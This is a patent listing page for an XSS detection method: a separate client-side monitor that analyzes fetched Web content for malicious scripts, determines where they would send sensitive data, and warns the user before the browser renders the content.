Cross-site script detection and prevention
First Claim
1. A method of detecting a cross-site script in Web content, the method comprising:
- receiving, in a monitor of a client computer, a message from a browser for retrieving the Web content, the browser executing on said client computer having sensitive information, wherein the monitor is a separate component from the browser and is not a plug-in to the browser;
retrieving the Web content from a target Web server;
storing said Web content by said monitor in said client computer;
analyzing the Web content for a cross-site script by said monitor;
if a cross-site script is present in said Web content, determining a destination to which some or all of the sensitive information will be sent if the cross-site script executes, said determining performed by said monitor; and
displaying a message in the browser relating to display of the Web content, thereby preventing execution of the cross-site script in the browser, and wherein the storing step, analyzing step and the determining step are performed at the monitor and not at the browser, before the Web content is received by the browser.
1 Assignment
0 Petitions
Accused Products
Abstract
A Web site uses a behavior monitor that operates as a gatekeeper for a browser. The attack injects Web content with malicious executable code that executes on an end user device when the code executes in a browser on the device. A message is received at the monitor from a browser for retrieving Web content; the browser executes on a computing device having sensitive information. The Web content is retrieved from a target Web server and analyzed for XSS. If found, the destination to which some or all of the sensitive information will be sent if the XSS executes is determined. A message is displayed in the browser regarding whether the Web content that was requested should be viewed in the browser. In this manner, execution of the XSS in the browser is prevented. The analyzing and determining steps are performed before the Web content is received by the browser.
78 Citations
24 Claims
-
1. A method of detecting a cross-site script in Web content, the method comprising:
-
receiving, in a monitor of a client computer, a message from a browser for retrieving the Web content, the browser executing on said client computer having sensitive information, wherein the monitor is a separate component from the browser and is not a plug-in to the browser; retrieving the Web content from a target Web server; storing said Web content by said monitor in said client computer; analyzing the Web content for a cross-site script by said monitor; if a cross-site script is present in said Web content, determining a destination to which some or all of the sensitive information will be sent if the cross-site script executes, said determining performed by said monitor; and displaying a message in the browser relating to display of the Web content, thereby preventing execution of the cross-site script in the browser, and wherein the storing step, analyzing step and the determining step are performed at the monitor and not at the browser, before the Web content is received by the browser. - View Dependent Claims (2, 3, 4, 5, 6, 7, 8, 9, 10, 11)
-
-
12. A client device comprising:
-
a processor; a network interface; and a memory for storing a cross-site script detection monitor having a browser interface coupled to an independent browser; a Web interface; and a Web content analysis module including a URL determination component and a URL validation component; wherein the cross-cite script detection monitor is separate from the browser and is not a plug-in to the browser; and a Web content storage area for storing Web content from a Web site, wherein the cross-site detection monitor detects a malicious cross-site script in said Web content that enables transmission of sensitive data relating to the client device to an unauthorized Web site. - View Dependent Claims (13, 14, 15, 16, 17, 18, 19)
-
-
20. A tangible and non-transitory computer-readable medium comprising computer code for detecting a cross-site script, said computer code of said computer-readable medium effecting the following:
-
receiving, in a monitor of a client computer, a message from a browser for retrieving the Web content, the browser executing on said client computer having sensitive information wherein the monitor is a separate component from the browser and is not a plug-in to the browser; retrieving the Web content from a target Web server; storing said Web content by said monitor in said client computer; analyzing the Web content for a cross-site script by said monitor; if cross-site script is present in said Web content, determining a destination to which some or all of the sensitive information will be sent if the cross-site script executes, said determining performed by said monitor; and displaying a message in the browser relating to display of the Web content, thereby preventing execution of the cross-site script in the browser if desired by a user, and wherein the storing step, analyzing step and the determining step are performed at the monitor and not at the browser, before the Web content is received by the browser. - View Dependent Claims (21, 22, 23, 24)
-
Specification